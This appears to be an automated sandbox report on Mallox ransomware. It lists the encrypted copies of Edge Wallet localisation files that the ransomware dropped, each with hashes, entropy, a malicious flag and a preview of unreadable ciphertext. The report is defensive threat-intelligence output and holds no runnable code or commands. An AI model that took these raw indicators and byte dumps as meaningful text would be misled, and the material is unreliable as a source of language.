                    Preview:....E.f"...S.....o[.....S.e.`6..u4.d...@..j.%...FF{..h..3e...).[7-...:.}.Wj..5Q..&f...6.mqRm4.Ok.xV.........\..GH....m.-TLl....K.|.zFD+..-.q....J....h...(N..)*.....Q.I\..@N8v.F.&,..g .p.S.)w{....%&.!.....&....c:[.V..$`w..N...7Y't..~..'h.H7.$.i......'..Kam.~..p......,......N....f....h...w.B)CE.u.};/.C.0"`.:k...G.R....w..wr..`.+.(`.qs...;....O..$.....o..l..&[..o...TD....../}.bLR.0..q.....w.\...S.X./\4hT1..0...q..Yz.|..O...0.`Z.hO<...OY$.....zFr~d.....6..Q...U]..J...'...g..L.z.+..i6N<..../....=...O..rI.>.\P.M6........q.xi...K4..f7..........B..4.9.....B:.r.....l.^+m&...C...".~\wLJ....A.l.....O.+o.8.+....0;W(...pY..Tr.........>V. ..M.:A.;....}.. _.....s..]>..\...t.,.?.......a...t^5..[.)|8...7..NJ..3h.....q..H2.'..}.k,\..B..~..t....F..........h.u........:.w/..."W.0=./....mz{<.M.p;..@W.*.)...wIaI.0.-].....]..s'.ww9. ...'..............o<.|..1.(.I.:....iwF...[.D.v.w..)....I(.....ZG.BCV.;..P1.Yo...].."b....1.\.T.u.....=..k/.q.:.E..p.~...>..f.

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\ar\strings.json.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:DOS executable (COM)
                    Category:dropped
                    Size (bytes):73398
                    Entropy (8bit):7.997485082806188
                    Encrypted:true
                    SSDEEP:1536:nORLWs2RAE1M+Z8pvtrCd0WIIXe8D05wTRpVCA6d/uBmqb:OBWs27RctezIIXgu1pr6d/uBme
                    MD5:B1B9AB89B7894BD8CDBA83C6F8620D19
                    SHA1:3F931D99399E2B5396ED308813CB3269D494ED97
                    SHA-256:76BD8FB16C6A48A9B20D4AD176BE63B6CD528365AD97C234C60791A2F5E4D03C
                    SHA-512:58B7F0C312A3DE9BAD60F8730460DA7B9DE3660F3D2949DEDF96A67CD16540838AB0CC1FD11A04E1A2E29FE0B82DF53393352DBE6516C6C964D16A980CA14782
                    Malicious:true
                    Preview:.d.0D#6.#2".~.E..wx..Xu.....aG.I..N..%Og.|.N.i;.#..O....6JPr-........'.%.k.@QF...3|.....o.~l......zd......[ .;....Y%.W.................X.5H9........X....Q.0[.............g..#......2T... .`...v.........rY.6'.....;.^.koI.}..W...U.S.......pT....V.K`.aE..Y....I.a.<..^..+v.?..#.4..{i8.}.t.f"..,+.......?.ilc.?.L:.E.T.N..;B.....|y..).w.e_...f.t...|Q.B....;:..x...b.a.....n......U.......#.1.`La..v...3.JPf.3.K+F...H...zF.0c..-..|......e......4....z...[...Z]=oN.B.......%.)..t2......V.V.7......pW..I....A....].P......J.....h.1,...Z\.../...x\.Ft.Wg.!..a.Fl.P..&.........`Bss.U......+:....M.A...I.d.j&+?....(.Bd.*3c..F..... ...c.5...r.;u*...*X..u..5.t....1.dq.......?...R....{]..]L.P96...5.n.u.o.qm...4.+.iAS...p..Q....T.Q.+(..t.n..aU.W..L.c..V.*c.k. Z.v...k.C.'Y..(]...%q.n%S..'....W.....c.#F..x.@y...5q..L!1..:.....*.(..v.X..C.S.q.2bj:...........|..u....~....X.x..S....p..c.2..Wu...E....A~"......R9.M..Z...L...u.7....~......Y.....M6..dle..

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\de\strings.json.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):63463
                    Entropy (8bit):7.997305096314498
                    Encrypted:true
                    SSDEEP:768:7m9fI7UWRva3VAche/nmEF0mtSlDauKv1+Bsz++rIdV9NPbLFSAIduSpOKc9VskR:7m8jiu+6101aKD+MdV7LFSFW9+UHRt
                    MD5:705C7E068F82A89E7212E0DFF427AB9C
                    SHA1:6E763181F5CB7B252D0F4BC809D7CC217C318D46
                    SHA-256:E6722FEC9E052EA0E2DFA8FCE6360BAF40096C22609B88049ABF30E2FA37731B
                    SHA-512:248E73ED1B22D33AB406EB204D1FEC42374F5BA9BC2F247AF673DC642F4BA981CD7EBB79D905BD4C8ECD42C53C6C27BC4C207628C1094B1AD23284C99146BE1F
                    Malicious:true
                    Preview:...}...c.qBju._./F..&.*.&.V..Y.?..]G4C.u..5.yLt.Ah...q....D...O.{...5.....W..U..8...9.37....z.2..H..B...CC....Z.j..L...t..48...=X..I+ ....p\...!ac...o..]...r.....`B..?......8...#....2..c.....+.g.....K....-..+~@4.......N....Y m.+....;.M.F8i.{...0~.|uN....//Y...n$.*A...sd.6....=...n.2`.......m.D.|..H..A......?%.z._5.\.. D.....+MMz....V...6. i.....I..c.Y)<..K9....P.z..f..B....?.DTH:....r....mst...(O.jq...76s....Ip.......Y....&...W.Y..H.?.*.Y .wV....U.6...h..,b.7...[.).C<.<X.3G.>.\.-b....O:.A..?......@.G...".....tm..&.y..o../......<....u.0,..._bL(.".P.....o..y..M.k.h..~x......23.K...h:./.`..5._..h...K..N....3N..>...I..."i.fgS..S.....P....gt.0.l.8F;v.6..4E..........jQ....3...x3....@d.>V...F.Z.FF.......k..4y.+.?..............E.eL..'z.....ik..f.J[.f.~/~V.....p=..]..8..u...I.B.$..d>83..I&..+...;*6..?.. ..ci.D...+..D5!..,...f...A.0...UY....R....H.).o.....Jy......l.;.v.z?B-).V.. ....d.".......2.....@.d..g.Fg]...u.ik...`f..Vi..X.pi.x..])U\o"_d7]m.

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\en-GB\strings.json.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):54686
                    Entropy (8bit):7.996968507493538
                    Encrypted:true
                    SSDEEP:768:yI+GzlxfySueFgGxvXHgNeFBRDRj+sjJz2Fec1fedUsjUrzPJBhywJa8O/:tnPxjaeF7Rwl2bYfhLJ3i
                    MD5:C54041B0467786806CCA3D23E353E28D
                    SHA1:A634AFAD2DEC125147715D6D2144F4DC983AEFB8
                    SHA-256:899E7B84E85E267409AD31B8F984F49812CD617759785E2CA19675A378CDC4A1
                    SHA-512:FAE0BEF3192C0165FEECFC00414134728E0FA4ADABB3EFE12610814C4EC9D355CF4BE80081286C8D0CE765B0CC3A0F90CD1B4503B25DA1353F9AD8CF379BAA50
                    Malicious:true
                    Preview:...q.I..iw~.b.{..t..kqj]..,(.....~.7.R...T...).........&n........^Z......5.0..r..f..V$f*h.....>...o.(O.{Qf:..{.=$..fhx.FM..@6.7.lK..y^<....& ...g.. .!%.].......7.....U.=.x.Uo.B...WpN.LiD..;...w..Q..f..a...gL..f..b.....z.p..;:F`wUh.4$c....6..%P......R..Wqo.].@.h......^_.I....1...-Wu.%.6......lE..?..p...x.2.h...g6..=...~. *BBl.j.G..N.!. .t..Tu{r.h.D.&e..X.........oV.-j.....P..9......a..q.Tq......>..Q>k...E..(}...z.K..H..;..2-.@......q..?.8jZ...p.l...W.0p#.[.^.%...,31E.(."..\!^..S....H..S.2.....0..u..1.Z...]...d."..2=.;4FI.A....>..i.B..L.....n..n!p....F.7..w...%.^...!.*s._.n...Zb...p1...9...N....g.c.......L",f.i..l.s.%+..4q...[......F.G9..95h.....a.C..... ..u+kGzP........].~g.eg.X.E.|..>....1.[&..)....".l..9....$.[l...&...1...hS$..*...y...........+.;a@...t...B..u.7VEYO..8[..f.H..\$GNW.&.....9.(.....X..{......p..C.:.I>5.....P...@a....;...Rp.>;..8c.YL.w}.....Z.m^J.....Zv.d?M..a...@.......fs.^3.........`...C....W..C...).......H.<.,...y.d.3....r.

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\es\strings.json.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):61052
                    Entropy (8bit):7.997110739626145
                    Encrypted:true
                    SSDEEP:1536:4xoUaW6wT1mXfp1s61q02EZqPcdIhGBbRmuq8TMh:6pJqzqkA343lMh
                    MD5:5CF0B1509014934AB56F9DFEF17F6F1D
                    SHA1:89052BBFF74A5333BBDCC4C90551B1E3346267DD
                    SHA-256:59968129135B5CFD960C50EA34E77370427E6AA5F9CB6520A502E4CCBC40EF6C
                    SHA-512:03C0B2C0C38BF6E73E9C4CB5D2B7280F8635092B25B7D244136AD2F95D7C8A6B0968DD6CCBFB6A2AA0A17F03770BB88852ACC33EC9F67760C5022BA948DCDA7A
                    Malicious:true
                    Preview:....n..;b....M.."..P.n5ol.N.6....=7X...4.....W.>wT.d...w..Tl...|B...v......a>x7K...1.e...P. ..39.../.3`..r..m..K.W.F.8.rNd9.>C;...........mJ.......p...#I.Q..........+..S6h..."(.*......}...R.uL...i..b.:...\......-.....4........B...@0.H$<..R.../...%..#D#T.D.lJc.=..@...p....&....x.../..&..9..$.d>_J......3..x.5...kR...z9.)_g..q.d-...Z..X<.u.>..pvi.x?.$......T..>....,i'..&...Xg(?&@c19x.n+....X.......adU.......R..L..C.0....-..}.:I..Ln..J......b._.....a\..#......+.$./....|......u.1.Q.i...}./...........)..i..x.i.^|.,...W......e.1.O.owt..e..!uj.&E.yN.....F...o t. ....M.k..;...2.h"........c....F.....^.].....K.9.6..1...wj.n.0.L..Y>9y)......DG.N...v.0.F...yDtb\.a.....5..Du..J.P.+J].`..@.'.Ll.@$FX!.(<..".^H5~.j#e.9X.g...oZU..~.......BAX$.h........4x.......5.5....8.|...+.....b.oz..).z.T)I..........x.v.G...rt.hqX~(.,Aqm...R....r..A....|xE.er......N.......9..m.7@.r_......SZ7....z)`..A...=.m:D.5...aq..H..W...g.....@....\?.z..h...E.6

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\fr-CA\strings.json.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:OpenPGP Public Key
                    Category:dropped
                    Size (bytes):64765
                    Entropy (8bit):7.997087639559998
                    Encrypted:true
                    SSDEEP:1536:M5p1yxYOw4RdE635NPyyt2n6GIINwJbBgxG4sXof:qp1yW4Q8x2VTilg9f
                    MD5:38649175DF2723CF5A06C8AB7ABE591C
                    SHA1:0E1C4C608C08210B418A46C0F7B3A7C992F7BE66
                    SHA-256:56D754FDD10881309BF442F910B7EF5796331F550C3E6F5B4D8ED8FEB0D8F57B
                    SHA-512:5E8E02A6F6095073F8E1A33774C1CE1F237DF08EDDAAA5D97238BFB7968E163C3BD6C19694ADC1B30AE06D0A9B46DDC98D4BFD68329482AE9D49F5A19ADD9365
                    Malicious:true
                    Preview:...JO..5y.g.../#.m3n..`....J..........B..hjP?'Ri.0.q$..<.A.I..%..f..=b...~...aJN.]r..w......5ca6..wE......X.gk....4$...G..e.].X......3.^.1.!dh.%.B....8..\...t..._&CU.[.`.C...GEC .Q.W.....B...q..e...!C9.S%ju........~..<.b.....q..^...e...Bl!E.0.4.?P7.(...uE..O...|..B.7<..F>!=..(/.."....^..`...Y..O.c..6...}W...Ty.c.Z[.s.%.r1.4.J..6.V.*.~._..B.>......h.?y...M.-.......'....G..1....,"...{....._.y..g.A^0tk.b......q_-<K..>:...U.N...Kd.7.CS.AZ...D...C.r..{5*..,......v.^.....ss...l..-...G....v.G....;$.x$..Ak......s@..@.C.h~k.".e.lR.8>...r......O........|.....jx...M...*?l.R.]e\.....'...6...).....XQ_y.><.w.p?|...(..%....q...x.#.Bj..G}.B.w5G..K..?.Kk..j> .W..=}./..1..$.).|..B....4;l....k./tY[.....N...E.[...4.l.X.O..l............Y,[.l.h_].tTAH.^k....`..I..d:.]A....?..@. .Pg&^.%...[...3A..f......T&M:..{.Hu.c"......\@.pu..%..T..E.d`.?K=.&.?5.E...F.Ll.K......>.m...6.....9.0..n..'.....K...j..4Qx..Z..>Vf.....2..*0}..t...z...,.!.A3..P.+a'1.O!....0E.r..c....

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\fr\strings.json.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):64757
                    Entropy (8bit):7.996916377569866
                    Encrypted:true
                    SSDEEP:1536:z/Bd1eWFkNRwmdaUSfTgx3laUwO22Mp8udNuMi05NN4YGq2NtK:zpd1eWeXFda3fTgJlCO26ujuMi05vp5V
                    MD5:0EFEAA018FFFF773CAF870B130045C5E
                    SHA1:3665FC8C8060DE99D5232ADE208C31E27CF5FC33
                    SHA-256:5324E3BD69241938B867BD0BB4954F1C4EF447A009D13DAECD69C78A598AD32B
                    SHA-512:9F7D53DC535A7C919DCC5F5D593E5EF7039547813642D41447570C8A6EA2A9022AAA0F378272D70FA75A8EBBBE9A4D2ADF73649AF3F08E265FB5925A024EB815
                    Malicious:true
                    Preview:kTW. .y&..,.g.}.l3z..D.6.......t.L._D.9a.a...h3.#...B.yN.p@...s.qAT.7..W..4(b.y.1.'s5...v".CO.Q`.G..NI.g.....&o.OQ/.....1u=..n.....R."....;...ni.r.........0br........b`..#...A.Y<.)..K....w.O...b..3.|.Eyp...4.[j>...>.T...u.D...eE.....+..u..SF.nU..s...........x......p.Y'.P.y..}....~.8....Fo..+~!~.......y.z..4.4.....P.3...2.~......8P..y..... .{.u..iM\.n.f...W=0Q.Aw...L...jcD.i..0..x.....t...i...J...>..D.....m.:*.&c.z..:..;....s.$a...l. .8...... d...(.b#g.....XvZ.{/....l'.0h.D...&.zo.......D...;..$..b.m-.+..4)...|<I..a\...G....xRg.j{....|bk..\H.@..5X(..gS*....&.S`.89B...B....z....8T..3'^.{..T?I....^>$.......u....X..+.>...k.J.Y9..._X..<R.C.fW...w....g&!...N.Fz..o.@.N....1"....+...s......N.'.....,^....9..Oo.........kH..x..c.......e8.%.wTE..Vy..+f.5.-zX'.)C..|.Z.zR..........d.~.....eA..<*<....i.......MmNl./...,.60?.w.....*<.9..............H./v...|....m'..{N7.......x..>...5.jM5)'...0?.j.'6..=.G8Z.....E/.V.I...^+.D=...K&R..Y..fb3.......

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\id\strings.json.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):58181
                    Entropy (8bit):7.996888355527411
                    Encrypted:true
                    SSDEEP:1536:F9HfDeIuT/IvbMO1xKz/UXUJUJm04NIuXQQ5G+jWs:F9HaIuabRxKLeUCMF6wvvWs
                    MD5:2BBFFABB727B60DC8EF229422739A280
                    SHA1:32DC20908A360C4AEF348479059493F53983A327
                    SHA-256:F98D962DD85C7E31964466BA9D2990D97B6DF0DC81019C56CD2D94897FEB69EB
                    SHA-512:E613799F1AACF2E09DEF0D97B8974B7657F580DAE268530BD7544E7924E76253093D81971D73C4813F6001C420EE4FCAF20DD875B92D7B61AB881D616CBB3DF2
                    Malicious:true
                    Preview:G....,d9..dH.e..SHa..JW.05.,.......#.H*....0_.:.....1=..X..C.....%7..b.c`... Q...\'.X....x {.@.9...f..xF..%."G..m.....yfi.L.@.%.......mv.......1+...2.?.S.x.C.... i...aN..5..y..l....h98.a..'.<(...I...\J.....<)Hn.0!.&.0%......[.......Y.....Q..V........b..o...KMX..\.]..b............QK..YcJC......Tq..T..1.....A...Q......1z%....i....$..r....Z=k.#]j..i5.f.C..`..i.N...L9....A1W...*y..&*H.}...!.....G....:..6_-@...c...PZs)....w.#.....q.,....%.=N.V..5.8e....f.L..4.j...........h.....#.....'L....?"%.:..$.........A...pI>.... .d:B.G.1.mb...Y..l6p.q@...<...g....i....AMF.J..B...... .!gE.^...5u..1..,.:..U......R{..$.d:.p~........$..R0.s.......$..&....h.X..a{..aA%.0.V......g4..2.......^.."%-g7lB..]<......wiS....y(..b.S..#.ht./~..h,.[....E..nT....h.u.) .`(..'S..m..XT|.UF......qI..".D....D......"..o.J.F.n.:.("c..O...........t...<.{.<#...*M..i...[ .G.[..o...jB...X\..........9V.....7k..F7n...>w.....Q....+....0..{...F.8............:./J.-....!.kM....Y.k.EN;o

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\it\strings.json.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:OpenPGP Public Key
                    Category:dropped
                    Size (bytes):60729
                    Entropy (8bit):7.996833329901674
                    Encrypted:true
                    SSDEEP:1536:NvhSYxZvS9LSNkNTH8TPuJ9GtDDFughId2gsCm:DNUT8ujAugadU9
                    MD5:C7D90DDCFD5998EADC7C9AFEC0EFEA9C
                    SHA1:C08B9AD4B0AC20977E27B6AF74C4D668379A1396
                    SHA-256:2F0E9DAC314E616CF8C5C3653F94976BDB281DAA546348838A0321199BB0FEF8
                    SHA-512:91A8A6C29E6262875F6E3798749F6867AD8A3ECCAF061D2A3AE0319CEAA0E5212FA20BC9FDE13B8E0E6FE191B677A46910D6CD11909FB0FEBF942D2D445B96A6
                    Malicious:true
                    Preview:.W...l......-.!...fA..:.0......~2........m.9..._...g7q..a.#...S_...jU.m.ik..z2...n.H.......I.$X..&..n....C.]2...)..v.5y.j.F4v=...]c@.bI...q..R...6)..E.3Jq....m_..{f....iiB.....v..../..WL.:+...l.YHqP..g..........U...J...q,...n. .-./.._d.`U..>W...+. c.?m..'.FUIfk...I..4&^O...\.F[^...f.!j..>i,.t..FeZ.F.".8z..cO.<.A..U.6..f.=....wv9F,....dcM.X..P.82..T.C..A...B..[.......^|.z..D.p.....Z..\..".>...uT..d...v:.d...W...!.y<^.V/..Y..=.}...WD.)...E.y...[p.LY..U%......y.Z..O..q.=..CZ={...v..u.n..+.)...-.(..Z4|..<....u...r..(^!...mF.......[.n..]..\......?F.'ra.....7;...G!...(...(......F..!m&...X....%.D.]D.....I..Sn...V0......(.."............'y.../S.....<...._.........RZ.._)/X...'./^n&..xH.4..h....`.~`.g..t..5.>...3.n.*.+.8=...=..V&..)B..7.....(...w{.h..K...Y...c..1....+D......]..(.......@4k.....^...S....K|)..F-.&t%...9ow...-...Q..@..3 [.K.W...%....(.....C6.*.!.J.<..B....|...u.$|..n.Z.*.+.2.{..2SZ.......`Nq%Z.....$e..^..1......b..)/..z....pjL

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\ja\strings.json.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):69552
                    Entropy (8bit):7.997460215093233
                    Encrypted:true
                    SSDEEP:1536:HSx5hqmo+kRMXX0+nYJ/8+8ZqZXVbbOdo4MENO7m0YvXq:H653o+kN+nec8ZFbbOGZMQMvXq
                    MD5:F97FE06A5FD3B2E888B5F45BF99CEC82
                    SHA1:B5F83C4E8233B9A6FAA62AA0DF2757639AE0D73D
                    SHA-256:E24FE2178CF65F26D03A083F0E3A2B334DF81885F51EB82EBFCD02D55825D8E1
                    SHA-512:4E46FE3BA0923AAFC8E359A50E428A04C5DB902D0F1AAF6616A4D860DFE4D0304219FEC9B9E7C79FC639E6AA18905F6EB0D1C006C7DC9820196842A02C97DB64
                    Malicious:true
                    Preview:8.Y..?.K..)..B.YVs....6;O...!.r.s>7..M. ......l.....'*.......=...0.,.......eC\...P.."..5%.S..[..0.......j`.I%.......k..E......*.".......b............~.s..b.r..*;<4v.]..........I.{....*......Xn|_..._.L...`.Fa.t.w.%.*.#.-.K.l..2....<w?U.uw..C.b..".U"|..DC.#.OFD..se..R..til..FD.P..M.=..J.mvt.-!.....L.;u6v.._.f..c.....7.v..uV......f...+.....V[."..d....l\....A..&...?........=.0.S......(......C...p.w.7^......f.v..?^..u.tw3:.Dk.-...e.....@.H'.3Sq...k...Bq...D.......#&VqV..0y..t)f........G..?..0.O...;.&A^...)..s.hp]~ft.<.J..5......T...h....lo..t.Ha....&rU.b...a.ur.XO.. ?../`....7..S3.b.R/-...OX.......k....t..z....:....w...*h=.f....%#.B.....t.?.HC..gt..'..m......S..%.e.....O.].p.....;G"m6..A..E.....v0..=.B..G.|..U....N.. ....yc._.@.'m..w$Fd...y]0..6y..RX.P......P.L..........r+@..J&..}E.~....G.W....!*g.X..@...:el0.{g;|..v.OG..W r.S.9q9<A.OJ..r...p4.....a8...6..e..F..h8g.]Q..tI....g;h....$.*..c....~-)..in.5"!'.2*EJ.!.|.QW.....1.#1.,..~*..R../..Ca.0.....],Dt..^

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\nl\strings.json.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):59780
                    Entropy (8bit):7.996753928141469
                    Encrypted:true
                    SSDEEP:1536:HquGpWpCyczplRDgH8owCtWOyRaSOPJVJcJHeZjY:HxGpwCFlR85oONXhVKkZjY
                    MD5:A7889312463F14271562B3083A9BA49D
                    SHA1:8989ACFBE283C7E1B8EFCA777941281AE623A2B1
                    SHA-256:8D3AE6BBCDCAD72407456732E57B8B36D09D0FDB461A72416BE7E817AC247AA6
                    SHA-512:0036F02F5E9EFBB4E3D71DD2473EACA67A4957AD341719C0B62A8F86BC47A2597216D6FA465E3A33093E314442C02FBB718AD947F6E99144D40C22DCD88A31D6
                    Malicious:true
                    Preview:..iJ.LO.l......CK6..[g.K.mO.._:.V.lN...^.....a......m<...3....".....M....y[2..1..!$....Z0.@..C6.='.._.._.|E.Z=...=..LG.E......4.?.s...Q.hQ8.N..+V....YO.W..z.|....p.x.eqO...T...!!TS8O..I'.D.'.)Lt.z=?..Mr[.KGl8..../.Q.6..6....B.x...=r.qa....]K....~F.......{.wp........._!Z.cl2...i.+.Ho..)6Q....!5E].v.DM.*...bu9.#.t..G.C..Q.r.W{..A. Yz~..z..4!..,n.(ElY.&3....Oi...[.-..QiH....<^.v.!..r"......v.,..o....d .b4...!.6..bcE8(.....].q..b..}...H8:H&..q..FJ..?T_.......7./+PF.....g...$....>...-O.u_]T.s....%..xR.....;../{:..-...i:.c^:T.......iL4.....(......~.c]..rBG..G+]....Z^..'y7:..].k^..*....}.... l. .....6b.l........Mk....+...#.8D.....v.$...b[5F*...h..$.C.H.9P...e$~.dg2.%KkE@..CY.q.|QfK..J..H.@.!...o..}L./.@....T+....zi%..............:`>..Pk..[P....1.?..bl&... K.E.]...7.s...x....R?J....b.4...>;|.[.........D.O.....Y.3x.5..... .......s.)..x~V.G..kr..9}...d.C...$1...Z.Z..........w........U...P.(]...wo.0).e.3P.^....B.....z...,.............

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\pt-BR\strings.json.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):60097
                    Entropy (8bit):7.997143372658634
                    Encrypted:true
                    SSDEEP:1536:sfAW+MHE8s97DBb3JdvvQE+OKyP3zpLx6H/aotl+cqL7c0NRfO:czVHAtbZdx+OH7pLAaCugURG
                    MD5:E7918AD849A2415B368D37F236658F66
                    SHA1:F6313FF8361C6D4B12DA218AEB0D7049C35F5229
                    SHA-256:58495E6E5C4F672D1E588288F273562836B6823B338049CF9E2FFAB10E676753
                    SHA-512:CD73756487D154C5B7814F281CCAE0B1B800E0D6A6591B393AD723C3F4D205E76B98579F8E1FA0E3728130BDC57CC83ACDC376BF8188152E0D661D59688BC21D
                    Malicious:true
                    Preview:5....dF.JU.=+O.c...g..3.....c...g.m.'....2.f@.Y......_.ul.N..`f.M9.43.T/......a3.["B.=.&.t....cZ.L..d.n.UagS)...&..\....K.t...r...Y..&.J@.(lC. z7L.x..O.......cU...q..2..,|..V..... ...D...N./...;.##...x.P.p?.b-m*}.Ksp....y..H=...`.eT.a.x..*.[......UO.$W.a....<."..Ev......,..ej9.....J.).....2KaW....UB\......."5./...$.X....|...5[*..y.\ u".k.........7.j.,....?{.....s.%.2# ..D....4...s..Ia..;..Ns....#..Ca...}o...=.'..:.z.........5..sS.._&;b...RK........G..H...M..!...+....{..s.;^..1.t..U4.........2.j...l..{..,%..uK......B.9a=...@../....g..Y.....a.R.......@..I_.<T.&..8ho6....8....~..]QW.[....v(...c.<._:>.....f.V}..s..U.7..>.1rx..D.<...bR .G{...E$>o.5....lF...F.`#M....X.V.d....W..T...^....tN....!D....o.B..>;YMH. .yQ..i.W0-\x:....T".P...y..\.9....#...T.)....*..S.....NS....=3N.y~.M...E.,z.(.b.............N...Xy.....U..)....l....tS+........z.p...$5{..........X...P...b......I..l.z.[}....q.....3Y...E.cv.D5.%..vs..y.1"..}.Q..T...[aK...5.2......

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\pt-PT\strings.json.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):61604
                    Entropy (8bit):7.996621739089687
                    Encrypted:true
                    SSDEEP:1536:IE4QRdP0r35DkDGDTf3MjWfu80qM2FJKMa6epY0/TqZQGVbYF:db6BaGDT/Yv80qMsJNa6PmqZfNY
                    MD5:893D15A86D8F12E39FEFC5C787E78284
                    SHA1:F486C0F8EA07BF19F970CED92FB46CF27A336F69
                    SHA-256:1B00F39EDE6EC459E854F3B937234D5AB1A13BD20CF4A8C7B37FF1AFB78AAA9C
                    SHA-512:6788BC1E2809D51CDBBCBBE8E5E5682B6A971047E1080E90EBEC0AFC57BE2FE06F8559ECAB84DAA74851562831BD9254F0E70F62B0C5CB0C7AAAEC11F56BFF00
                    Malicious:true
                    Preview:..V(..Y......tt!.{.....$..z..!#.).@...o.u....../......Y..n.[3nzm......0..^^..q.....T./m9/c.]....J.D...T.t.&....q&.......NP]...F #n...H....5..S..Jo.7Bq........G....~@.W...w..Z..N;.Dy.F%.z...r,.U.0.. l|Y...B,..k".r....x........y3t..R..X..+........z.V..r2.R.(.t.H.f.....AW..Q.. ... >o!.p..M...A.....L..e2.&............y.ER.S-..b........Nu.....K..-if..2.6Zz...!D...\.'f ...n.R.b.J......J.....G....{.Lb]>....\..........P.Q...=...._.]-..X>..?.....w.UJ+`......]Z..o..e...>!.u.1..:..m...5.cx....-0..o,.......2.....~...PUI....I?....\.p3.e....r...}....1..y..Z..x..0'?.<JF.....5..."....@........:/..k.).=...`z..I.Y.7(.n9.8Z....47..A-|o...^%.. .....;...1..F.}.0.&.........T....[.........G..."..n...hI.t.<.K...s.1.L\.N....o._0.!O...MzG.i.....=..a..9iv.E..Y&.....i....,.B.r.4..p.../...UY...0WY.2.0|.dc).L....:.~.Qz..Q.VZ..xl..g.P..p..m.w.....d.y.v..$.(+x..ut..B....$..u.0....t.....C.0T..!.......ph..:.d....Z....w..W..#/...sv.C.H.k.a..B.2....X.....f.4;4p

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\ru\strings.json.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):84150
                    Entropy (8bit):7.99799965203965
                    Encrypted:true
                    SSDEEP:1536:KgnM4sjASVAneHGkkqD/l422YzyOb5GCQSiKF02qdVZlTOBiu:Kgn+ESVAelZDtEO1wCXqXTYiu
                    MD5:509C284853F0F1696FB67B53B71FD996
                    SHA1:794EE0ED3EE3932A8EFF68EB0DC659359214F9A4
                    SHA-256:4F2A53732BF453BC382596A5E5F49C44B42C4B0AE919A7569E0D1E622FDE98AC
                    SHA-512:136724B4182E2A7502F93A6F422C23CA135D9DBB5F2E8403A40CE468A8C780CD38F204BBA8FAFE92754A4024E9F5F870609FA795AF50003CC6B0A0FB26A2BBB4
                    Malicious:true
                    Preview:.!y.Y....b....34..YN.G#...~.....7}M.5e.&....|...3..h.E.(.D...X......~..V4.z.7}.D.s..+..s.ny.;v.P.N...9............`$:.q.`w>...3T?'S......)y.5..b.{.<..gs..B.~.^.k.H..aG.^6...-^.."C.f..uu.>.t.......a[.R..}|]d..?.;R.*.?..`e.......\...Y.)......g.(sI"..S.[.H....K6.........}.S(..[....,..a.....+i.......Z^.P.....5.?o.R.........C..O...j..k-.l....oOo^...{......q..<......)..:.......".\...7.dC.]..R.eeI./4V.C..p.7)..J..6.6u.a?E...Ze_.fd,q...C..].33$..z./..7...9-.SD......./.,.%G.V......h/..Y..I.6....)80..g.....u=..I..*Y..5.G.o!...b...<....L.....?6DS...v.......b......}..HXO....1}..2.P./.^..+@.Dn...*h.JJ~....y.t.1..L......O.........w.m...+*7..}...c.^3c..\1...m.A..}...x..G-j...PS.q....;.X....!... ..ZD......V..f#pf.....?.u..lW.K.xk&..y..tk...V.+. ...r....v.5)...)..@...+.t.1%..|.Ce...9k(Wz.E.....~.J..f. .4...F..-...Y...}.z.....;......O.Vy.....t-...*.......e...*1...........K.y..O......!.|*.].4.N..:..Y.'...>Y.-.qxz.-Cv..\...w.-..7:.H...9%.......$.dIeQ

